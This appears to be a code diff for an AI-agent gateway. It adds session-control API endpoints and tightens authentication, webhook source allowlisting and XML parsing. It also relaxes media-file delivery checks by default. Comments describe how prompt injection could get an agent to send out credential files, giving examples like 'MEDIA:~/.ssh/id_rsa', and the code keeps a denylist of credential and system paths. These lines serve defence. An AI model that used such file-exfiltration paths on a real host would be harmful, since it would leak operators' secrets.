"configured": _toolset_has_keys(name, config),
"tools": tools,
})
except Exception:
logger.exception("GET /v1/toolsets failed")
return web.json_response(
_openai_error("Failed to enumerate toolsets", err_type="server_error"),
status=500,
)
return web.json_response({
"object": "list",
"platform": "api_server",
"data": data,
})
# ------------------------------------------------------------------
# /api/sessions — thin client/session resource API
# ------------------------------------------------------------------
@staticmethod
def _parse_nonnegative_int(value: Any, default: int, maximum: int) -> int:
try:
parsed = int(value)
except (TypeError, ValueError):
return default
if parsed < 0:
return default
return min(parsed, maximum)
@staticmethod
def _session_response(session: Dict[str, Any]) -> Dict[str, Any]:
"""Return a stable, client-safe session representation."""
safe_keys = (
"id", "source", "user_id", "model", "title", "started_at", "ended_at",
"end_reason", "message_count", "tool_call_count", "input_tokens",
"output_tokens", "cache_read_tokens", "cache_write_tokens",
"reasoning_tokens", "estimated_cost_usd", "actual_cost_usd",
"api_call_count", "parent_session_id", "last_active", "preview",
"_lineage_root_id",
)
payload = {key: session.get(key) for key in safe_keys if key in session}
# Avoid exposing full system prompts/model_config through the client API;
# callers only need to know whether those snapshots exist.
payload["has_system_prompt"] = bool(session.get("system_prompt"))
payload["has_model_config"] = bool(session.get("model_config"))
return payload
@staticmethod
def _message_response(message: Dict[str, Any]) -> Dict[str, Any]:
safe_keys = (
"id", "session_id", "role", "content", "tool_call_id", "tool_calls",
"tool_name", "timestamp", "token_count", "finish_reason", "reasoning",
"reasoning_content",
)
return {key: message.get(key) for key in safe_keys if key in message}
async def _read_json_body(self, request: "web.Request") -> tuple[Dict[str, Any], Optional["web.Response"]]:
try:
body = await request.json()
except Exception:
return {}, web.json_response(_openai_error("Invalid JSON in request body"), status=400)
if not isinstance(body, dict):
return {}, web.json_response(_openai_error("Request body must be a JSON object"), status=400)
return body, None
def _get_existing_session_or_404(self, session_id: str) -> tuple[Optional[Dict[str, Any]], Optional["web.Response"]]:
db = self._ensure_session_db()
if db is None:
return None, web.json_response(_openai_error("Session database unavailable", code="session_db_unavailable"), status=503)
session = db.get_session(session_id)
if not session:
return None, web.json_response(_openai_error(f"Session not found: {session_id}", code="session_not_found"), status=404)
return session, None
def _conversation_history_for_session(self, session_id: str) -> List[Dict[str, Any]]:
db = self._ensure_session_db()
if db is None:
return []
try:
return db.get_messages_as_conversation(session_id)
except Exception as exc:
logger.warning("Failed to load session history for %s: %s", session_id, exc)
return []
async def _handle_list_sessions(self, request: "web.Request") -> "web.Response":
"""GET /api/sessions — list persisted Hermes sessions."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
db = self._ensure_session_db()
if db is None:
return web.json_response(_openai_error("Session database unavailable", code="session_db_unavailable"), status=503)
limit = self._parse_nonnegative_int(request.query.get("limit"), default=50, maximum=200)
offset = self._parse_nonnegative_int(request.query.get("offset"), default=0, maximum=1_000_000)
source = request.query.get("source") or None
include_children = _coerce_request_bool(request.query.get("include_children"), default=False)
sessions = db.list_sessions_rich(
source=source,
limit=limit,
offset=offset,
include_children=include_children,
order_by_last_active=True,
)
return web.json_response({
"object": "list",
"data": [self._session_response(s) for s in sessions],
"limit": limit,
"offset": offset,
"has_more": len(sessions) == limit,
})
async def _handle_create_session(self, request: "web.Request") -> "web.Response":
"""POST /api/sessions — create an empty Hermes session row."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
body, err = await self._read_json_body(request)
if err:
return err
db = self._ensure_session_db()
if db is None:
return web.json_response(_openai_error("Session database unavailable", code="session_db_unavailable"), status=503)
raw_id = body.get("id") or body.get("session_id")
session_id = str(raw_id).strip() if raw_id else f"api_{int(time.time())}_{uuid.uuid4().hex[:8]}"
if not session_id or re.search(r'[\r\n\x00]', session_id):
return web.json_response(_openai_error("Invalid session ID", code="invalid_session_id"), status=400)
if len(session_id) > self._MAX_SESSION_HEADER_LEN:
return web.json_response(_openai_error("Session ID too long", code="invalid_session_id"), status=400)
if db.get_session(session_id):
return web.json_response(_openai_error(f"Session already exists: {session_id}", code="session_exists"), status=409)
model = body.get("model") or self._model_name
system_prompt = body.get("system_prompt")
if system_prompt is not None and not isinstance(system_prompt, str):
return web.json_response(_openai_error("system_prompt must be a string", code="invalid_system_prompt"), status=400)
db.create_session(session_id, "api_server", model=str(model) if model else None, system_prompt=system_prompt)
title = body.get("title")
if title is not None:
try:
db.set_session_title(session_id, str(title))
except ValueError as exc:
db.delete_session(session_id)
return web.json_response(_openai_error(str(exc), code="invalid_title"), status=400)
session = db.get_session(session_id) or {"id": session_id, "source": "api_server", "model": model, "title": title}
return web.json_response({"object": "hermes.session", "session": self._session_response(session)}, status=201)
async def _handle_get_session(self, request: "web.Request") -> "web.Response":
"""GET /api/sessions/{session_id}."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
session, err = self._get_existing_session_or_404(request.match_info["session_id"])
if err:
return err
return web.json_response({"object": "hermes.session", "session": self._session_response(session)})
async def _handle_patch_session(self, request: "web.Request") -> "web.Response":
"""PATCH /api/sessions/{session_id} — update client-safe session metadata."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
session_id = request.match_info["session_id"]
session, err = self._get_existing_session_or_404(session_id)
if err:
return err
body, err = await self._read_json_body(request)
if err:
return err
allowed = {"title", "end_reason"}
unknown = sorted(set(body) - allowed)
if unknown:
return web.json_response(_openai_error(f"Unsupported session fields: {', '.join(unknown)}", code="unsupported_session_field"), status=400)
db = self._ensure_session_db()
if "title" in body:
try:
db.set_session_title(session_id, "" if body["title"] is None else str(body["title"]))
except ValueError as exc:
return web.json_response(_openai_error(str(exc), code="invalid_title"), status=400)
if body.get("end_reason"):
db.end_session(session_id, str(body["end_reason"]))
session = db.get_session(session_id) or session
return web.json_response({"object": "hermes.session", "session": self._session_response(session)})
async def _handle_delete_session(self, request: "web.Request") -> "web.Response":
"""DELETE /api/sessions/{session_id}."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
session_id = request.match_info["session_id"]
session, err = self._get_existing_session_or_404(session_id)
if err:
return err
db = self._ensure_session_db()
deleted = db.delete_session(session_id)
return web.json_response({"object": "hermes.session.deleted", "id": session_id, "deleted": bool(deleted)})
async def _handle_session_messages(self, request: "web.Request") -> "web.Response":
"""GET /api/sessions/{session_id}/messages."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
session_id = request.match_info["session_id"]
_, err = self._get_existing_session_or_404(session_id)
if err:
return err
db = self._ensure_session_db()
messages = db.get_messages(session_id)
return web.json_response({
"object": "list",
"session_id": session_id,
"data": [self._message_response(m) for m in messages],
})
async def _handle_fork_session(self, request: "web.Request") -> "web.Response":
"""POST /api/sessions/{session_id}/fork — branch via current SessionDB primitives."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
source_id = request.match_info["session_id"]
source, err = self._get_existing_session_or_404(source_id)
if err:
return err
body, err = await self._read_json_body(request)
if err:
return err
db = self._ensure_session_db()
fork_id = str(body.get("id") or body.get("session_id") or f"api_{int(time.time())}_{uuid.uuid4().hex[:8]}").strip()
if not fork_id or re.search(r'[\r\n\x00]', fork_id):
return web.json_response(_openai_error("Invalid session ID", code="invalid_session_id"), status=400)
if db.get_session(fork_id):
return web.json_response(_openai_error(f"Session already exists: {fork_id}", code="session_exists"), status=409)
# Match the CLI /branch semantics: mark the original as branched, then
# create a child session that carries the transcript forward. This uses
# SessionDB's native parent_session_id/end_reason visibility model rather
# than inventing a parallel fork store.
db.end_session(source_id, "branched")
db.create_session(
fork_id,
"api_server",
model=source.get("model"),
system_prompt=source.get("system_prompt"),
parent_session_id=source_id,
)
messages = db.get_messages(source_id)
db.replace_messages(fork_id, messages)
title = body.get("title")
if title is None:
base = source.get("title") or "fork"
try:
title = db.get_next_title_in_lineage(base)
except Exception:
title = f"{base} fork"
try:
db.set_session_title(fork_id, str(title))
except ValueError as exc:
return web.json_response(_openai_error(str(exc), code="invalid_title"), status=400)
fork = db.get_session(fork_id) or {"id": fork_id, "parent_session_id": source_id}
return web.json_response({"object": "hermes.session", "session": self._session_response(fork)}, status=201)
async def _handle_session_chat(self, request: "web.Request") -> "web.Response":
"""POST /api/sessions/{session_id}/chat — one synchronous agent turn."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
gateway_session_key, key_err = self._parse_session_key_header(request)
if key_err is not None:
return key_err
session_id = request.match_info["session_id"]
_, err = self._get_existing_session_or_404(session_id)
if err:
return err
body, err = await self._read_json_body(request)
if err:
return err
user_message, err = _session_chat_user_message(body)
if err is not None:
return err
system_prompt = body.get("system_message") or body.get("instructions")
if system_prompt is not None and not isinstance(system_prompt, str):
return web.json_response(_openai_error("system_message must be a string", code="invalid_system_message"), status=400)
history = self._conversation_history_for_session(session_id)
result, usage = await self._run_agent(
user_message=user_message,
conversation_history=history,
ephemeral_system_prompt=system_prompt,
session_id=session_id,
gateway_session_key=gateway_session_key,
)
effective_session_id = result.get("session_id") if isinstance(result, dict) else session_id
final_response = result.get("final_response", "") if isinstance(result, dict) else ""
headers = {"X-Hermes-Session-Id": effective_session_id or session_id}
if gateway_session_key:
headers["X-Hermes-Session-Key"] = gateway_session_key
return web.json_response(
{
"object": "hermes.session.chat.completion",
"session_id": effective_session_id or session_id,
"message": {"role": "assistant", "content": final_response},
"usage": usage,
},
headers=headers,
)
async def _handle_session_chat_stream(self, request: "web.Request") -> "web.StreamResponse":
"""POST /api/sessions/{session_id}/chat/stream — SSE wrapper over _run_agent."""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
gateway_session_key, key_err = self._parse_session_key_header(request)
if key_err is not None:
return key_err
session_id = request.match_info["session_id"]
_, err = self._get_existing_session_or_404(session_id)
if err:
return err
body, err = await self._read_json_body(request)
if err:
return err
user_message, err = _session_chat_user_message(body)
if err is not None:
return err
system_prompt = body.get("system_message") or body.get("instructions")
if system_prompt is not None and not isinstance(system_prompt, str):
return web.json_response(_openai_error("system_message must be a string", code="invalid_system_message"), status=400)
loop = asyncio.get_running_loop()
queue: "asyncio.Queue[Optional[tuple[str, Dict[str, Any]]]]" = asyncio.Queue()
message_id = f"msg_{uuid.uuid4().hex}"
run_id = f"run_{uuid.uuid4().hex}"
seq = 0
def _event_payload(name: str, payload: Dict[str, Any]) -> tuple[str, Dict[str, Any]]:
nonlocal seq
seq += 1
payload.setdefault("session_id", session_id)
payload.setdefault("run_id", run_id)
payload.setdefault("seq", seq)
payload.setdefault("ts", time.time())
return name, payload
def _enqueue(name: str, payload: Dict[str, Any]) -> None:
event = _event_payload(name, payload)
try:
running_loop = asyncio.get_running_loop()
except RuntimeError:
running_loop = None
try:
if running_loop is loop:
queue.put_nowait(event)
else:
loop.call_soon_threadsafe(queue.put_nowait, event)
except RuntimeError:
pass
def _delta(delta: str) -> None:
if delta:
_enqueue("assistant.delta", {"message_id": message_id, "delta": delta})
def _tool_progress(event_type: str, tool_name: str = None, preview: str = None, args=None, **kwargs) -> None:
if event_type == "reasoning.available":
_enqueue("tool.progress", {"message_id": message_id, "tool_name": tool_name or "_thinking", "delta": preview or ""})
elif event_type in {"tool.started", "tool.completed", "tool.failed"}:
event_name = event_type.replace("tool.", "tool.")
_enqueue(event_name, {"message_id": message_id, "tool_name": tool_name, "preview": preview, "args": args})
async def _run_and_signal() -> None:
try:
await queue.put(_event_payload("run.started", {"user_message": {"role": "user", "content": user_message}}))
await queue.put(_event_payload("message.started", {"message": {"id": message_id, "role": "assistant"}}))
history = self._conversation_history_for_session(session_id)
result, usage = await self._run_agent(
user_message=user_message,
conversation_history=history,
ephemeral_system_prompt=system_prompt,
session_id=session_id,
stream_delta_callback=_delta,
tool_progress_callback=_tool_progress,
gateway_session_key=gateway_session_key,
)
final_response = result.get("final_response", "") if isinstance(result, dict) else ""
effective_session_id = result.get("session_id", session_id) if isinstance(result, dict) else session_id
await queue.put(_event_payload("assistant.completed", {
"session_id": effective_session_id,
"message_id": message_id,
"content": final_response,
"completed": True,
"partial": False,
"interrupted": False,
}))
await queue.put(_event_payload("run.completed", {
"session_id": effective_session_id,
"message_id": message_id,
"completed": True,
"usage": usage,
}))
except Exception as exc:
logger.exception("[api_server] session chat stream failed")
await queue.put(_event_payload("error", {"message": str(exc)}))
finally:
await queue.put(_event_payload("done", {}))
await queue.put(None)
task = asyncio.create_task(_run_and_signal())
try:
self._background_tasks.add(task)
except TypeError:
pass
if hasattr(task, "add_done_callback"):
task.add_done_callback(self._background_tasks.discard)
headers = {
"Content-Type": "text/event-stream",
"Cache-Control": "no-cache",
"X-Accel-Buffering": "no",
"X-Hermes-Session-Id": session_id,
}
if gateway_session_key:
headers["X-Hermes-Session-Key"] = gateway_session_key
response = web.StreamResponse(status=200, headers=headers)
await response.prepare(request)
last_write = time.monotonic()
try:
while True:
try:
item = await asyncio.wait_for(queue.get(), timeout=CHAT_COMPLETIONS_SSE_KEEPALIVE_SECONDS)
except asyncio.TimeoutError:
await response.write(b": keepalive\n\n")
last_write = time.monotonic()
continue
if item is None:
break
name, payload = item
data = json.dumps(payload, ensure_ascii=False)
await response.write(f"event: {name}\ndata: {data}\n\n".encode("utf-8"))
last_write = time.monotonic()
except (asyncio.CancelledError, ConnectionResetError):
task.cancel()
raise
except Exception as exc:
logger.debug("[api_server] session SSE stream error: %s", exc)
return response
async def _handle_chat_completions(self, request: "web.Request") -> "web.Response":
"""POST /v1/chat/completions — OpenAI Chat Completions format."""
auth_err = self._check_auth(request)
@@ -3486,12 +4048,24 @@ class APIServerAdapter(BasePlatformAdapter):
try:
mws = [mw for mw in (cors_middleware, body_limit_middleware, security_headers_middleware) if mw is not None]
self._app = web.Application(middlewares=mws, client_max_size=MAX_REQUEST_BYTES)
self._app["api_server_adapter"] = self
assert self._app is not None
self._app.router.add_get("/health", self._handle_health)
self._app.router.add_get("/health/detailed", self._handle_health_detailed)
self._app.router.add_get("/v1/health", self._handle_health)
self._app.router.add_get("/v1/models", self._handle_models)
self._app.router.add_get("/v1/capabilities", self._handle_capabilities)
self._app.router.add_get("/v1/skills", self._handle_skills)
self._app.router.add_get("/v1/toolsets", self._handle_toolsets)
# Session/client control surface (thin wrappers over SessionDB + _run_agent)
self._app.router.add_get("/api/sessions", self._handle_list_sessions)
self._app.router.add_post("/api/sessions", self._handle_create_session)
self._app.router.add_get("/api/sessions/{session_id}", self._handle_get_session)
self._app.router.add_patch("/api/sessions/{session_id}", self._handle_patch_session)
self._app.router.add_delete("/api/sessions/{session_id}", self._handle_delete_session)
self._app.router.add_get("/api/sessions/{session_id}/messages", self._handle_session_messages)
self._app.router.add_post("/api/sessions/{session_id}/fork", self._handle_fork_session)
self._app.router.add_post("/api/sessions/{session_id}/chat", self._handle_session_chat)
self._app.router.add_post("/api/sessions/{session_id}/chat/stream", self._handle_session_chat_stream)
self._app.router.add_post("/v1/chat/completions", self._handle_chat_completions)
self._app.router.add_post("/v1/responses", self._handle_responses)
self._app.router.add_get("/v1/responses/{response_id}", self._handle_get_response)
@@ -3511,6 +4085,12 @@ class APIServerAdapter(BasePlatformAdapter):
self._app.router.add_get("/v1/runs/{run_id}/events", self._handle_run_events)
self._app.router.add_post("/v1/runs/{run_id}/approval", self._handle_run_approval)
self._app.router.add_post("/v1/runs/{run_id}/stop", self._handle_stop_run)
# Store the adapter after native routes are registered. Local Hermes-Relay
# bootstrap shims use this key as a feature-detection hook; registering
# native routes first lets those shims no-op instead of shadowing the
# upstream session-control handlers.
self._app["api_server_adapter"] = self
# Start background sweep to clean up orphaned (unconsumed) run streams
sweep_task = asyncio.create_task(self._sweep_orphaned_runs())
try:
@@ -3520,11 +4100,13 @@ class APIServerAdapter(BasePlatformAdapter):
if hasattr(sweep_task, "add_done_callback"):
sweep_task.add_done_callback(self._background_tasks.discard)
# Refuse to start network-accessible without authentication
if is_network_accessible(self._host) and not self._api_key:
# Refuse to start without authentication. The API server can
# dispatch terminal-capable agent work, so every deployment needs
# an explicit API_SERVER_KEY regardless of bind address.
if not self._api_key:
logger.error(
"[%s] Refusing to start: binding to %s requires API_SERVER_KEY. "
"Set API_SERVER_KEY or use the default 127.0.0.1.",
"[%s] Refusing to start: API_SERVER_KEY is required for the API server, "
"including loopback-only binds on %s.",
self.name, self._host,
)
return False
@@ -3562,14 +4144,6 @@ class APIServerAdapter(BasePlatformAdapter):
await self._site.start()
self._mark_connected()
if not self._api_key:
logger.warning(
"[%s] ⚠️ No API key configured (API_SERVER_KEY / platforms.api_server.key). "
"All requests will be accepted without authentication. "
"Set an API key for production deployments to prevent "
"unauthorized access to sessions, responses, and cron jobs.",
self.name,
)
logger.info(
"[%s] API server listening on http://%s:%d (model: %s)",
self.name, self._host, self._port, self._model_name,
+52 -7
View File
@@ -829,6 +829,13 @@ _HERMES_HOME = get_hermes_home()
MEDIA_DELIVERY_ALLOW_DIRS_ENV = "HERMES_MEDIA_ALLOW_DIRS"
MEDIA_DELIVERY_TRUST_RECENT_ENV = "HERMES_MEDIA_TRUST_RECENT_FILES"
MEDIA_DELIVERY_TRUST_RECENT_SECONDS_ENV = "HERMES_MEDIA_TRUST_RECENT_SECONDS"
# Strict mode toggles the original allowlist+recency path-validation behavior.
# Off by default — symmetric with inbound (we accept any document type the
# user uploads), and with the denylist still blocking obvious credential /
# system paths. Operators running public-facing gateways where prompt
# injection from one user could exfiltrate the host's secrets to that same
# user should set this to true.
MEDIA_DELIVERY_STRICT_ENV = "HERMES_MEDIA_DELIVERY_STRICT"
MEDIA_DELIVERY_SAFE_ROOTS = (
IMAGE_CACHE_DIR,
AUDIO_CACHE_DIR,
@@ -918,6 +925,21 @@ def _media_delivery_recency_seconds() -> float:
return float(_MEDIA_DELIVERY_TRUST_RECENT_DEFAULT_SECONDS)
def _media_delivery_strict_mode() -> bool:
"""Return True when path validation should require allowlist/recency match.
Off by default. In non-strict mode, ``validate_media_delivery_path``
accepts any existing regular file that isn't under the credential /
system-path denylist restoring the pre-#29523 behavior for the
single-user case. Strict mode preserves the original
allowlist+recency-window logic for operators running public-facing
gateways where prompt injection from one user shouldn't be able to
exfiltrate the host's secrets to that same user.
"""
raw = os.environ.get(MEDIA_DELIVERY_STRICT_ENV, "0").strip().lower()
return raw in ("1", "true", "yes", "on")
def _media_delivery_denied_paths() -> List[Path]:
"""Return absolute denylist paths under which delivery is never allowed."""
denied = [Path(p) for p in _MEDIA_DELIVERY_DENIED_PREFIXES]
@@ -972,10 +994,22 @@ def _path_is_within(path: Path, root: Path) -> bool:
def validate_media_delivery_path(path: str) -> Optional[str]:
"""Return a safe absolute file path for native media delivery, else None.
MEDIA tags and bare local paths in model output are untrusted text. Only
existing regular files under Hermes-managed media caches, or roots the
operator explicitly allowlists, may be uploaded as native attachments.
Symlinks are resolved before the containment check.
Default mode (single-user / private gateway): accept any existing regular
file that isn't under the credential / system-path denylist
(``_MEDIA_DELIVERY_DENIED_PREFIXES`` + ``~/.ssh``, ``~/.aws``, etc.).
This matches the symmetry of inbound delivery Telegram/Discord/Slack
will hand the agent any file the user uploads, and the agent can hand
back any file that isn't a credential.
Strict mode (opt-in via ``gateway.strict`` in ``config.yaml`` or
``HERMES_MEDIA_DELIVERY_STRICT=1``): the file MUST live under a
Hermes-managed cache, under an operator-allowlisted root
(``HERMES_MEDIA_ALLOW_DIRS``), or be freshly produced inside the
configured recency window. Suitable for public-facing bots where
prompt injection from one user shouldn't be able to exfiltrate the
host's secrets to that same user.
Symlinks are resolved before any containment / denylist check.
"""
if not path:
return None
@@ -999,6 +1033,8 @@ def validate_media_delivery_path(path: str) -> Optional[str]:
if not resolved.is_file():
return None
# Cache / operator allowlist is always honored — these are unconditionally
# trusted regardless of mode.
for root in _media_delivery_allowed_roots():
try:
resolved_root = root.expanduser().resolve(strict=False)
@@ -1007,9 +1043,18 @@ def validate_media_delivery_path(path: str) -> Optional[str]:
if _path_is_within(resolved, resolved_root):
return str(resolved)
# Outside the cache/operator allowlist: fall back to recency-based trust
# for files the agent has just produced (e.g. ``pandoc -o /tmp/report.pdf``
# or ``write_file("/home/user/report.pdf", ...)``). System paths and
# Non-strict mode (default): accept anything not on the denylist.
# The denylist still blocks /etc, /proc, ~/.ssh, ~/.aws, ~/.hermes/.env,
# ~/.hermes/auth.json, etc. — so the obvious prompt-injection sites
# (``MEDIA:/etc/passwd``, ``MEDIA:~/.ssh/id_rsa``) remain rejected.
if not _media_delivery_strict_mode():
if _path_under_denied_prefix(resolved):
return None
return str(resolved)
# Strict mode: fall back to recency-based trust for freshly-produced
# files (e.g. ``pandoc -o /tmp/report.pdf`` or
# ``write_file("/home/user/report.pdf", ...)``). System paths and
# credential locations remain blocked even when "recent" — see
# ``_MEDIA_DELIVERY_DENIED_PREFIXES`` for the denylist.
window = _media_delivery_recency_seconds()
+20 -2
View File
@@ -25,6 +25,7 @@ from gateway.platforms.base import (
MessageEvent,
MessageType,
SendResult,
is_network_accessible,
)
logger = logging.getLogger(__name__)
@@ -132,12 +133,24 @@ class MSGraphWebhookAdapter(BasePlatformAdapter):
def set_notification_scheduler(self, scheduler: Optional[NotificationScheduler]) -> None:
self._notification_scheduler = scheduler
def _source_allowlist_required_but_missing(self) -> bool:
return is_network_accessible(self._host) and not self._allowed_source_networks
async def connect(self) -> bool:
if self._client_state is None:
logger.error(
"[msgraph_webhook] Refusing to start without extra.client_state configured"
)
return False
if self._source_allowlist_required_but_missing():
logger.error(
"[msgraph_webhook] Refusing to start: binding to %s requires "
"extra.allowed_source_cidrs. Configure the Microsoft Graph "
"source CIDRs or bind to loopback (127.0.0.1/::1) behind a "
"tunnel or reverse proxy.",
self._host,
)
return False
app = web.Application()
app.router.add_get(self._health_path, self._handle_health)
@@ -177,6 +190,8 @@ class MSGraphWebhookAdapter(BasePlatformAdapter):
return {"name": chat_id, "type": "webhook"}
async def _handle_health(self, request: "web.Request") -> "web.Response":
if not self._source_ip_allowed(request):
return web.Response(status=403)
return web.json_response(
{
"status": "ok",
@@ -271,9 +286,12 @@ class MSGraphWebhookAdapter(BasePlatformAdapter):
def _source_ip_allowed(self, request: "web.Request") -> bool:
"""Return True if the request's source IP is in the configured allowlist.
When ``allowed_source_cidrs`` is empty (the default), everything is
allowed preserves behavior for dev tunnels / localhost setups.
Loopback-only binds may omit ``allowed_source_cidrs`` for local reverse
proxies and dev tunnels. Network-accessible binds fail closed until an
explicit CIDR allowlist is configured.
"""
if self._source_allowlist_required_but_missing():
return False
if not self._allowed_source_networks:
return True
peer = request.remote or ""
+18 -6
View File
@@ -240,7 +240,7 @@ def _render_table_block_for_telegram(table_block: list[str]) -> str:
first_data_row = _split_markdown_table_row(table_block[2]) if len(table_block) > 2 else []
has_row_label_col = len(first_data_row) == len(headers) + 1
rendered_rows: list[str] = []
rendered_groups: list[str] = []
for index, row in enumerate(table_block[2:], start=1):
cells = _split_markdown_table_row(row)
if has_row_label_col:
@@ -258,12 +258,24 @@ def _render_table_block_for_telegram(table_block: list[str]) -> str:
elif len(data_cells) > len(headers):
data_cells = data_cells[: len(headers)]
rendered_rows.append(f"**{heading}**")
rendered_rows.extend(
f"{header}: {value}" for header, value in zip(headers, data_cells)
)
# Build the bulleted lines for this row. Skip any bullet whose value
# duplicates the heading text -- when has_row_label_col is False the
# heading IS the first data cell, and emitting it twice (once as the
# bold heading, once as the first bullet) is visual noise.
bullets: list[str] = []
for header, value in zip(headers, data_cells):
if not has_row_label_col and value == heading:
continue
bullets.append(f"{header}: {value}")
return "\n\n".join(rendered_rows)
# Within a row-group: single newline between heading and its bullets,
# and between successive bullets. This keeps the row visually tight
# on Telegram instead of stretching each bullet into its own paragraph.
group_lines = [f"**{heading}**", *bullets]
rendered_groups.append("\n".join(group_lines))
# Between row-groups: blank line so each group reads as a distinct block.
return "\n\n".join(rendered_groups)
def _wrap_markdown_tables(text: str) -> str:
+12 -2
View File
@@ -17,7 +17,17 @@ import logging
import socket as _socket
import time
from typing import Any, Dict, List, Optional
from xml.etree import ElementTree as ET
# Security: parse untrusted, pre-auth request bodies (WeCom callbacks) with
# defusedxml to block billion-laughs / entity-expansion (and XXE) DoS. The
# parsing API (fromstring) is a drop-in for the stdlib calls used below;
# response-building XML lives in wecom_crypto.py and is not parsed here.
try:
import defusedxml.ElementTree as ET
DEFUSEDXML_AVAILABLE = True
except ImportError:
ET = None # type: ignore[assignment]
DEFUSEDXML_AVAILABLE = False
try:
from aiohttp import web
@@ -49,7 +59,7 @@ MESSAGE_DEDUP_TTL_SECONDS = 300
def check_wecom_callback_requirements() -> bool:
return AIOHTTP_AVAILABLE and HTTPX_AVAILABLE
return AIOHTTP_AVAILABLE and HTTPX_AVAILABLE and DEFUSEDXML_AVAILABLE
class WecomCallbackAdapter(BasePlatformAdapter):
+408 -51
View File
@@ -75,6 +75,7 @@ _TELEGRAM_NOISY_STATUS_RE = re.compile(
r"|configured\s+compression\s+model\s+.+\s+failed"
r"|no\s+auxiliary\s+llm\s+provider\s+configured"
r"|auto-lowered\s+compression\s+threshold"
r"|compacting\s+context\s+[—-]\s+summarizing\s+earlier\s+conversation"
r"|preflight\s+compression"
r"|rate\s+limited\.\s+waiting\s+\d"
r"|retrying\s+in\s+\d"
@@ -818,7 +819,6 @@ if _config_path.exists():
"singularity_image": "TERMINAL_SINGULARITY_IMAGE",
"modal_image": "TERMINAL_MODAL_IMAGE",
"daytona_image": "TERMINAL_DAYTONA_IMAGE",
"vercel_runtime": "TERMINAL_VERCEL_RUNTIME",
"ssh_host": "TERMINAL_SSH_HOST",
"ssh_user": "TERMINAL_SSH_USER",
"ssh_port": "TERMINAL_SSH_PORT",
@@ -831,6 +831,8 @@ if _config_path.exists():
"docker_env": "TERMINAL_DOCKER_ENV",
"docker_mount_cwd_to_workspace": "TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE",
"docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",
"docker_persist_across_processes": "TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES",
"docker_orphan_reaper": "TERMINAL_DOCKER_ORPHAN_REAPER",
"sandbox_dir": "TERMINAL_SANDBOX_DIR",
"persistent_shell": "TERMINAL_PERSISTENT_SHELL",
}
@@ -932,9 +934,14 @@ if _config_path.exists():
_redact = _security_cfg.get("redact_secrets")
if _redact is not None:
os.environ["HERMES_REDACT_SECRETS"] = str(_redact).lower()
# Gateway settings (media delivery allowlist + recency trust)
# Gateway settings (media delivery allowlist + recency trust + strict mode)
_gateway_cfg = _cfg.get("gateway", {})
if isinstance(_gateway_cfg, dict):
_strict = _gateway_cfg.get("strict")
if _strict is not None:
os.environ["HERMES_MEDIA_DELIVERY_STRICT"] = (
"1" if _strict else "0"
)
_allow_dirs = _gateway_cfg.get("media_delivery_allow_dirs")
if _allow_dirs:
if isinstance(_allow_dirs, str):
@@ -1078,14 +1085,19 @@ def _resolve_runtime_agent_kwargs() -> dict:
resolve_runtime_provider,
format_runtime_provider_error,
)
from hermes_cli.auth import AuthError
from hermes_cli.auth import AuthError, is_rate_limited_auth_error
try:
runtime = resolve_runtime_provider()
except AuthError as auth_exc:
# Primary provider auth failed (expired token, revoked key, etc.).
# Try the fallback provider chain before raising.
logger.warning("Primary provider auth failed: %s — trying fallback", auth_exc)
# Distinguish a transient rate-limit/quota cap (credentials are fine,
# re-auth cannot help) from a genuine auth failure (expired/revoked
# token). Both fall through to the fallback chain, but the log message
# must not mislabel a quota exhaustion as an auth failure (#32790).
if is_rate_limited_auth_error(auth_exc):
logger.warning("Primary provider rate-limited (429): %s — trying fallback", auth_exc)
else:
logger.warning("Primary provider auth failed: %s — trying fallback", auth_exc)
fb_config = _try_resolve_fallback_provider()
if fb_config is not None:
return fb_config
@@ -1131,9 +1143,13 @@ def _try_resolve_fallback_provider() -> dict | None:
explicit_base_url=entry.get("base_url"),
explicit_api_key=explicit_api_key,
)
# Log the literal `provider` key from config, not the resolved
# runtime category — an Ollama fallback resolves through the
# OpenAI-compatible path and would otherwise be logged as
# "openrouter", contradicting the operator's config (#32790).
logger.info(
"Fallback provider resolved: %s model=%s",
runtime.get("provider"),
entry.get("provider") or runtime.get("provider"),
entry.get("model"),
)
return {
@@ -3223,9 +3239,21 @@ class GatewayRunner:
self._busy_ack_ts[session_key] = now
# Build a status-rich acknowledgment
# Build a status-rich acknowledgment. Mobile chat defaults keep this
# terse; detailed iteration/tool state is still available in logs and
# can be opted in per platform via display.platforms.<platform>.busy_ack_detail.
from gateway.display_config import resolve_display_setting
status_parts = []
if running_agent and running_agent is not _AGENT_PENDING_SENTINEL:
busy_ack_detail_enabled = bool(
resolve_display_setting(
_load_gateway_config(),
_platform_config_key(event.source.platform),
"busy_ack_detail",
True,
)
)
if busy_ack_detail_enabled and running_agent and running_agent is not _AGENT_PENDING_SENTINEL:
try:
summary = running_agent.get_activity_summary()
iteration = summary.get("api_call_count", 0)
@@ -5392,6 +5420,49 @@ class GatewayRunner:
)
stale_timeout_seconds = 0
# Read kanban.default_assignee — fallback profile for tasks
# created without an explicit assignee (e.g. via the dashboard).
# When set, the dispatcher applies it to unassigned ready tasks
# instead of skipping them indefinitely (#27145). Empty string
# (the schema default) means "no fallback, keep skipping" —
# backward-compatible with existing installs.
default_assignee = (kanban_cfg.get("default_assignee") or "").strip() or None
if default_assignee:
logger.info(
"kanban dispatcher: default_assignee=%r (unassigned ready tasks "
"will route to this profile)",
default_assignee,
)
# Read kanban.max_in_progress_per_profile — per-profile concurrency
# cap (#21582). When set, no single profile gets more than N
# workers running at once, even if the global max_in_progress
# would allow it. Prevents one profile's local model / API quota
# / browser pool from being overwhelmed by a fan-out.
raw_per_profile = kanban_cfg.get("max_in_progress_per_profile", None)
max_in_progress_per_profile = None
if raw_per_profile is not None:
try:
max_in_progress_per_profile = int(raw_per_profile)
except (TypeError, ValueError):
logger.warning(
"kanban dispatcher: invalid kanban.max_in_progress_per_profile=%r; ignoring",
raw_per_profile,
)
max_in_progress_per_profile = None
else:
